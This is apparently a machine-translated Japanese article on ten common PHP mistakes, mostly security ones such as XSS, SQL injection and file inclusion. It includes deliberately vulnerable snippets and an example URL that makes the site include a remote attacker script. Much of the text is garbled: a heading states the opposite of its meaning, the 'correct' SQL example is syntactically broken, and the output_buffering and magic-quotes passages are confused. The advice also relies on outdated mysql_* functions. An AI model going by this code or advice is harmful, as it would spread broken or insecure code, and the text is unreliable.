PHP ソフトウェア エンジニアが起こす最も一般的な 10 の異常

PHP プログラマーが犯す最も一般的な 10 の間違い

PHP は優れた Web 開発言語であり、柔軟な言語ですが、私は PHP プログラマーが何度も犯すいくつかの間違いを見てきました。私は、PHP プログラマーが犯しやすい 10 個の間違いのリストを以下に作成しました。そのほとんどはセキュリティに関連しています。どのような間違いを犯したか見てみましょう

1. HTML エンティティを無視しないでください

?

??基本的な常識: すべての信頼できない入力 (特にユーザーがフォームから送信したデータ) は、出力前に解釈されなければなりません。

echo $_GET['usename'] ;

?

この例では次の出力が得られます:

<script>/*管理者パスワードを変更または Cookie を設定するスクリプト*/</script>

ユーザーが正しく入力していることを確認しない限り、これは明らかなセキュリティ リスクです。

修正方法:

「」、「and」などを正しい HTML 表現 ('、および ") に変換する必要があります。関数 htmlspecialchars および htmlentities() がこの仕事を行います。

正しい方法:

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

?

2. SQL 入力を無視しないでください

以前記事に書きましたSQLインジェクションを防ぐ最も簡単な方法(php+mysql) はこの問題について議論し、簡単な方法を示しました。ある人は、すでに php.ini で magic_quotes が On に設定されているので、心配する必要はないと言いましたが、すべての入力が $_GET、$_POST、または $_COOKIE から来ているわけではありません。

修正方法:

そして SQL インジェクションを防ぐ最も簡単な方法 (php+mysql) 同様に、mysql_real_escape_string() 関数を使用することをお勧めします

正しいアプローチ:

$sql = "ユーザー設定を更新

name='.mysql_real_escape_string($name).'

WHERE id='.mysql_real_escape_string ($id).'";

mysql_query($sql);

?>

?

3. HTTP ヘッダー関連関数の誤った使用: header()、session_start()、setcookie()

この警告に遭遇しましたか?「警告: ヘッダー情報を追加できません - ヘッダーはすでに送信されました [....]

Web ページがサーバーからダウンロードされるたびに、サーバーの出力はヘッダーと本文の 2 つの部分に分割されます。

ヘッダーには、Cookie などの非視覚的データが含まれています。常に頭が最初に到着します。テキスト部分には、ビジュアル HTML、画像、その他のデータが含まれます。

ifoutput_buffering Off に設定すると、出力前にすべての HTTP ヘッダー関連関数を呼び出す必要があります。問題は、ある環境で開発し、別の環境にデプロイするときに、output_buffering が発生することです。 設定が異なる場合があります。その結果、リダイレクトが停止し、Cookie とセッションが正しく設定されませんでした...

修正方法:

出力する前に必ず http ヘッダー関連関数を呼び出し、output_buffering = Off にしてください。

。

4. ファイルに安全でないデータを使用する必要がある

繰り返しますが、自分で明示的に宣言していないデータは信頼しないでください。 $_GET、$_POST、または $_COOKIE から取得したファイルを含めたり、要求したりしないでください。

?

例:

index.php

//ヘッダー、構成、データベース接続などを含む

include($_GET['filename']);

//フッターを含む

?>

あらゆるハッカーが以下を使用できるようになりました:http://www.yourdomain.com/index.php?filename=anyfile.txt

は機密情報を取得するか、PHP スクリプトを実行します。

ifallow_url_fopen =オン 、あなたはさらに死んでいます:

次の入力を試してください:

http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

これであなたのページには http://www.youaredoomed.com/phphack.php が含まれます 出力: ハッカーはスパムの送信、パスワードの変更、ファイルの削除などを行うことができます。想像できるものなら何でも。

修正方法:

どのファイルを include ディレクティブまたは require ディレクティブに含めることができるかを制御する必要があります。

これは簡単ではありますが、包括的な解決策ではありません:

//許可されたファイルのみを含めます。

$allowedFiles = array('file1.txt','file2.txt','file3.txt');

if(in_array((string)$_GET['filename'],$allowedFiles)) {

include($_GET['filename']);

}

その他{

exit('許可されていません');

}

?>

5. 文法エラー

文法エラーには、非常に一般的なため、ここにリストする必要があるすべての語彙および文法エラーが含まれます。解決策は、PHP の構文を注意深く研究し、括弧、中括弧、セミコロン、または引用符を見逃さないように注意することです。また、メモ帳は使用せずに、適切なエディタを見つけてください。

?

6. オブジェクト指向をほとんどまたはまったく使用しない

多くのプロジェクトは PHP のオブジェクト指向テクノロジを使用していないため、コードのメンテナンスには非常に時間と労力がかかります。 PHP はますます多くのオブジェクト指向テクノロジをサポートしており、ますます改良されています。オブジェクト指向テクノロジを使用しない理由はありません。

?

7. フレームワークを使用しない

PHP プロジェクトの 95% は、作成、編集、リスト、削除という同じ 4 つのことを実行しています。これらの 4 つのことを完了するのに役立つ MVC フレームワークが多数あります。なぜそれらを使用しないのでしょうか。

?

8. PHP で既に利用可能な関数がわからない

PHP のコアには多くの関数が含まれています。多くのプログラマーは何度も車輪の再発明を繰り返します。多くの時間が無駄になりました。コーディング前に検索する PHP mamual、Google で検索すると、何か新しいものが見つかるかもしれません。 PHP の exec() は cmd を実行できる強力な関数です シェルを呼び出し、実行結果の最終行を文字列として返します。セキュリティ上の理由から、EscapeShellCmd() を使用できます。

?

9. 古いバージョンの PHP を使用する

多くのプログラマーは依然として PHP4 を使用しています。PHP4 での開発では PHP の可能性を最大限に活用することができず、セキュリティ上のリスクが依然として存在します。 PHP5 に切り替えるには、それほど手間はかかりません。ほとんどの PHP4 プログラムは、ステートメントをほとんど変更せずに、またはまったく変更せずに PHP5 に移行できます。 http://www.nexen.netによると 調査によると、PHP サーバーの 12% のみが PHP5 を使用しているため、PHP 開発者の 88% は依然として PHP4 を使用しています。

?

10. 引用符を 2 回変換します

Web ページに「または」が表示されるのを見たことはありますか? これは通常、開発者の環境では magic_quotes がオフに設定されているためです 、そしてデプロイされたサーバー上magic_quotes =on . PHP は、GET、POST、COOKIE のデータに対して addslashes() を繰り返し実行します。

原文:

それは文字列です

魔法の引用:

それは文字列です

もう一度実行します

addslashes():

それは文字列です

HTML 出力:

それは文字列です

もう 1 つの状況は、ユーザーが最初に間違ったログイン情報を入力すると、サーバーが間違った入力を検出した後、同じフォームを出力してユーザーに再入力を要求し、ユーザーの入力が 2 回変更されることです。